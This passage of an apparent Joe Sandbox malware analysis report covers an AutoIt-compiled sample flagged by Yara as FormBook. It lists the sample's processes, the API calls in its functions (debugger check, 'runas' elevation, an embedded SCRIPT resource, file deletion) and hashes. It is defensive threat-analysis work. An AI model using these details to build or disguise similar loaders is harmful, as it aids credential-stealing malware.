Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3471913898.0000000003000000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3471962975.0000000003050000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3470661135.0000000002920000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	19:01:32
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff728280000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.9%
Dynamic/Decrypted Code Coverage:	8.2%
Signature Coverage:	9%
Total number of Nodes:	2000
Total number of Limit Nodes:	57

Executed Functions

Function 00B7CBD0 Relevance: 23.2, APIs: 11, Strings: 2, Instructions: 418COMMON

Download Yara Rule

Strings

d, xrefs: 00B7C294
w, xrefs: 00B7C289

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID: d$w
API String ID: 0-2400632791
Opcode ID: 7259f460c798b8ba9fe974f4e3aa49b655cbc627ef49d170f72214e38dedd4c7
Instruction ID: 3f9578aac97f5fa3fb006755216cdc519dc3c25de2528d0d49dd3faf33b4b94a
Opcode Fuzzy Hash: 7259f460c798b8ba9fe974f4e3aa49b655cbc627ef49d170f72214e38dedd4c7
Instruction Fuzzy Hash: 7CC1552190C340AECB354A248C5AF763FE0EB61720F8DC5DEE57EAA1F3D7259C049A52

Function 00403B3A Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00403B68
IsDebuggerPresent.KERNEL32 ref: 00403B7A
GetFullPathNameW.KERNEL32(00007FFF,?,?,004C52F8,004C52E0,?,?), ref: 00403BEB

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

Part of subcall function 0041092D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00403C14,004C52F8,?,?,?), ref: 0041096E

SetCurrentDirectoryW.KERNEL32(?), ref: 00403C6F
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,004B7770,00000010), ref: 0043D281
SetCurrentDirectoryW.KERNEL32(?,004C52F8,?,?,?), ref: 0043D2B9
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,004B4260,004C52F8,?,?,?), ref: 0043D33F
ShellExecuteW.SHELL32(00000000,?,?), ref: 0043D346

Part of subcall function 00403A46: GetSysColorBrush.USER32(0000000F), ref: 00403A50
Part of subcall function 00403A46: LoadCursorW.USER32(00000000,00007F00), ref: 00403A5F
Part of subcall function 00403A46: LoadIconW.USER32(00000063), ref: 00403A76
Part of subcall function 00403A46: LoadIconW.USER32(000000A4), ref: 00403A88
Part of subcall function 00403A46: LoadIconW.USER32(000000A2), ref: 00403A9A
Part of subcall function 00403A46: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00403AC0
Part of subcall function 00403A46: RegisterClassExW.USER32(?), ref: 00403B16

Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00403A03
Part of subcall function 004039D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00403A24
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A38
Part of subcall function 004039D5: ShowWindow.USER32(00000000,?,?), ref: 00403A41

Part of subcall function 0040434A: _memset.LIBCMT ref: 00404370
Part of subcall function 0040434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00404415

Strings

%I, xrefs: 00403C44
runas, xrefs: 0043D33A
This is a third-party compiled AutoIt script., xrefs: 0043D279

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%I
API String ID: 529118366-2806069697
Opcode ID: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
Instruction ID: 3b6422646bc5bb7d448bfeb78fc2b200dbb07c6b17ab8a28721e135d33d4e7f3
Opcode Fuzzy Hash: b128d0c6ffbd213b78e7c991bc090ab0c4f1b42087612c7af0eba3310dd4a508
Instruction Fuzzy Hash: 8D519275D08108AADB01AFB5EC05EEE7BB8AB45745B1040BFF811B21E1DA786685CB2D

Function 004049A0 Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 004049CD

Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06

GetCurrentProcess.KERNEL32(?,0048FAEC,00000000,00000000,?), ref: 00404A9A
IsWow64Process.KERNEL32(00000000), ref: 00404AA1
GetNativeSystemInfo.KERNEL32(00000000), ref: 00404AE7
FreeLibrary.KERNEL32(00000000), ref: 00404AF2
GetSystemInfo.KERNEL32(00000000), ref: 00404B23
GetSystemInfo.KERNEL32(00000000), ref: 00404B2F

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction ID: 9368d54b81b13d28e750e9b7a77ce7499fab44d9898740901c219fded0589530
Opcode Fuzzy Hash: b374ae1e67c8a6c2b1dbeda5d6e5ff35506d62aec5490ffb1568074e7c13b988
Instruction Fuzzy Hash: 7A91A4719897C0DACB21DBA894501ABBFF5AF69300F444D6FD1C6A3B41D238B908C76E

Function 00404E89 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00404D8E,?,?,00000000,00000000), ref: 00404E99
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00404D8E,?,?,00000000,00000000), ref: 00404EB0
LoadResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D937
SizeofResource.KERNEL32(?,00000000,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F), ref: 0043D94C
LockResource.KERNEL32(00404D8E,?,?,00404D8E,?,?,00000000,00000000,?,?,?,?,?,?,00404E2F,00000000), ref: 0043D95F

Strings

SCRIPT, xrefs: 00404EA6

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction ID: 68981a4d98a1b9f26aaf18e99fd77eadcf83d6f3c297b7fdd3b7e429ee84fbe5
Opcode Fuzzy Hash: 41d1929798edb895ac9d7ecac736fa75257a1a0119b35b9f9055d793dd554d7f
Instruction Fuzzy Hash: 59119EB0200300BFD7208B65EC48F2B7BBAFBC9B11F20467DF505D62A0DB71E8058665

Function 0040FCE0 Relevance: 9.8, APIs: 3, Strings: 2, Instructions: 1040COMMON

Download Yara Rule

Strings

%I, xrefs: 0040FCF3
pD, xrefs: 004449B9

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: BuffCharUpper
String ID: pD$%I
API String ID: 3964851224-4040355302
Opcode ID: a9c8ef4fda0b7e55d89722692ea3cf0021274fdfe5a7acec23e971159d777e66
Instruction ID: 7d186bf48a599790b4ae94b3728c2257f551fe3f353e5d611b392294ecc69107
Opcode Fuzzy Hash: a9c8ef4fda0b7e55d89722692ea3cf0021274fdfe5a7acec23e971159d777e66
Instruction Fuzzy Hash: C8927D706043419FD720DF15C480B6BB7E1BF89304F14896EE8999B392D779EC85CB9A

Function 0040E6A0 Relevance: 8.6, Strings: 6, Instructions: 1102COMMON

Download Yara Rule

Strings

DdL, xrefs: 0040EAC1
Variable must be of type 'Object'., xrefs: 00443E62
DdL, xrefs: 00443B2E
pD, xrefs: 0040EA84, 0040EB29, 0040EB37, 0040EB45, 0040EB59, 0040EEF4, 0040EF02, 0040EF2A, 0040EF32, 0040EF90, 0040EF98, 0040EFB7, 0040EFC5, 00443B47
DdL, xrefs: 0040EABA
DdL, xrefs: 00443AF5

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID:
String ID: DdL$DdL$DdL$DdL$Variable must be of type 'Object'.$pD
API String ID: 0-3145290137
Opcode ID: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
Instruction ID: 023dab180a9d3d77a7e8607c3136a2e1727c845c037ec0be429657ea2820e701
Opcode Fuzzy Hash: 97f9bde554957965b7b42cd5819d1e83dff20a0b2ac5c190b6517ea4d9eb7987
Instruction Fuzzy Hash: C3A29E75A00205CFDB24CF56C480AAAB7B1FF58314F24887BE905AB391D739ED52CB99

Function 0046445A Relevance: 4.5, APIs: 3, Instructions: 25fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0043E398), ref: 0046446A
FindFirstFileW.KERNEL32(?,?), ref: 0046447B
FindClose.KERNEL32(00000000), ref: 0046448B

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: FileFind$AttributesCloseFirst
String ID:
API String ID: 48322524-0
Opcode ID: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction ID: 0270b6235cd3a211ff5fd07bbdee7491b27fcb3ec88e67c823a813e2b68c3cf0
Opcode Fuzzy Hash: 4840215ffa09c9e98f8c71f503fabca7b99ef5557041bbbf62c8821922d9d811
Instruction Fuzzy Hash: 54E0D8328105006B4610AB78EC0E4EE775C9E85335F100B6AFC35C11D0FB789904969F

Function 004109D0 Relevance: 59.0, APIs: 27, Strings: 6, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410A5B
timeGetTime.WINMM ref: 00410D16
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00410E53
Sleep.KERNEL32(0000000A), ref: 00410E61
LockWindowUpdate.USER32(00000000,?,?), ref: 00410EFA
DestroyWindow.USER32 ref: 00410F06
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00410F20
Sleep.KERNEL32(0000000A,?,?), ref: 00444E83
TranslateMessage.USER32(?), ref: 00445C60
DispatchMessageW.USER32(?), ref: 00445C6E
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00445C82

Strings

@COM_EVENTOBJ, xrefs: 004454F0
@GUI_CTRLHANDLE, xrefs: 00444FE4
@GUI_WINHANDLE, xrefs: 00444F8F
@TRAY_ID, xrefs: 0044578F
pD, xrefs: 00444F59, 00444FAE, 00445003, 004457B4
@GUI_CTRLID, xrefs: 00444F3A

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pD
API String ID: 4212290369-4240826242
Opcode ID: 992f45e81dcc9556020dd72de597c80dd6be193c0b5d75ab4febd2bc204f2c1e
Instruction ID: d38973a2ad724f636fdb88fa2895c4b9f48f3c0ad1428ec49bcc8c13362f202a
Opcode Fuzzy Hash: 992f45e81dcc9556020dd72de597c80dd6be193c0b5d75ab4febd2bc204f2c1e
Instruction Fuzzy Hash: BBB29470608741DFEB24DF24C445BABB7E4BF84304F14492FE54997292D779E885CB8A

Function 00B78550 Relevance: 21.5, APIs: 14, Instructions: 539COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00B77FD4
FreeSid.ADVAPI32(?), ref: 00B78579

Memory Dump Source

Source File: 00000000.00000002.2247376463.0000000000B50000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b50000_uG3I84bQEr.jbxd

Similarity

API ID: ErrorFreeLast
String ID:
API String ID: 1762890227-0
Opcode ID: 261563487ac7e1487e7b978ab2f87f3f8f8de302e6529fba6403e657510639a6
Instruction ID: e3e92bb58cb4b459bfea0b61cf6cadb9d7c39e5f66a3cd3d4320e41553d7a6e6
Opcode Fuzzy Hash: 261563487ac7e1487e7b978ab2f87f3f8f8de302e6529fba6403e657510639a6
Instruction Fuzzy Hash: 83F11720ACC3809ECB3646284C4C7352AE5DB76770F5DC6DAE47DEA1F2DE648D049267

Function 00469155 Relevance: 19.8, APIs: 13, Instructions: 322
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00468F5F: __time64.LIBCMT ref: 00468F69

Part of subcall function 00404EE5: _fseek.LIBCMT ref: 00404EFD

__wsplitpath.LIBCMT ref: 00469234

Part of subcall function 004240FB: __wsplitpath_helper.LIBCMT ref: 0042413B

_wcscpy.LIBCMT ref: 00469247
_wcscat.LIBCMT ref: 0046925A
__wsplitpath.LIBCMT ref: 0046927F
_wcscat.LIBCMT ref: 00469295
_wcscat.LIBCMT ref: 004692A8

Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FDE
Part of subcall function 00468FA5: _memmove.LIBCMT ref: 00468FED

_wcscmp.LIBCMT ref: 004691EF

Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469824
Part of subcall function 00469734: _wcscmp.LIBCMT ref: 00469837

DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00469452
_wcsncpy.LIBCMT ref: 004694C5
DeleteFileW.KERNEL32(?,?), ref: 004694FB
CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00469511
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469522
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00469534

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
String ID:
API String ID: 1500180987-0
Opcode ID: 42ca5def20852a3b51acdf0d31bf7b6556b1a546efe55efa71e12235d2c80c01
Instruction ID: 02a21988af13e7247216c1d96107bbd8e14577c6ac0cce12fd44c5267f831f24
Opcode Fuzzy Hash: 42ca5def20852a3b51acdf0d31bf7b6556b1a546efe55efa71e12235d2c80c01
Instruction Fuzzy Hash: 22C13DB1900129AADF11DF95CC81ADEB7BCEF85314F0040ABF609E6251EB749E858F69

Function 00403015 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

0, xrefs: 00403056
AutoIt v3 GUI, xrefs: 00403090
TaskbarCreated, xrefs: 004030A4
+, xrefs: 0040305D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction ID: 4440f0663549e4d62e3da2fdffcae7bb40582d53fb7b12173dce245a48cd956c
Opcode Fuzzy Hash: 8f69357ad4fd7de76c78bba9f685936345070209800999283baa0b23664e753e
Instruction Fuzzy Hash: 5F317A71801348AFDB50DFA4DC84A9DBFF0FB09310F24456EE480E62A0D7B91599CF69

Function 00403041 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 00403074
RegisterClassExW.USER32(00000030), ref: 0040309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004030AF
InitCommonControlsEx.COMCTL32(?), ref: 004030CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 004030DC
LoadIconW.USER32(000000A9), ref: 004030F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00403101

Strings

0, xrefs: 00403056
AutoIt v3 GUI, xrefs: 00403090
TaskbarCreated, xrefs: 004030A4
+, xrefs: 0040305D

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction ID: 5f72cbcfe52bedf9aac6cae92f5874e6cc1455117f94183018d2e1bba946cea4
Opcode Fuzzy Hash: 1851e2fbc18e2f99d75288993840a6d640a6fda4d586a764550e5d38fc6b7f12
Instruction Fuzzy Hash: DD21F9B1911208AFEB40EF94EC48B9DBBF4FB08700F10453AF511A62A0D7B555948FA9

Function 0040708B Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,004C52F8,?,004037AE,?), ref: 00404724

Part of subcall function 0042050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00407165), ref: 0042052D

RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 004071A8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0043E8C8
RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 0043E909
RegCloseKey.ADVAPI32(?), ref: 0043E947
_wcscat.LIBCMT ref: 0043E9A0

Strings

Software\AutoIt v3\AutoIt, xrefs: 0040719E
\Include\, xrefs: 00407165
Include, xrefs: 0043E8BF, 0043E900
\, xrefs: 0043E9C3

Memory Dump Source

Source File: 00000000.00000002.2246740931.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2246719807.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.000000000048F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246808782.00000000004B4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246867996.00000000004BE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246898201.00000000004C7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246969320.000000000051F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2246991882.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_uG3I84bQEr.jbxd

Similarity

API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
API String ID: 2673923337-2727554177
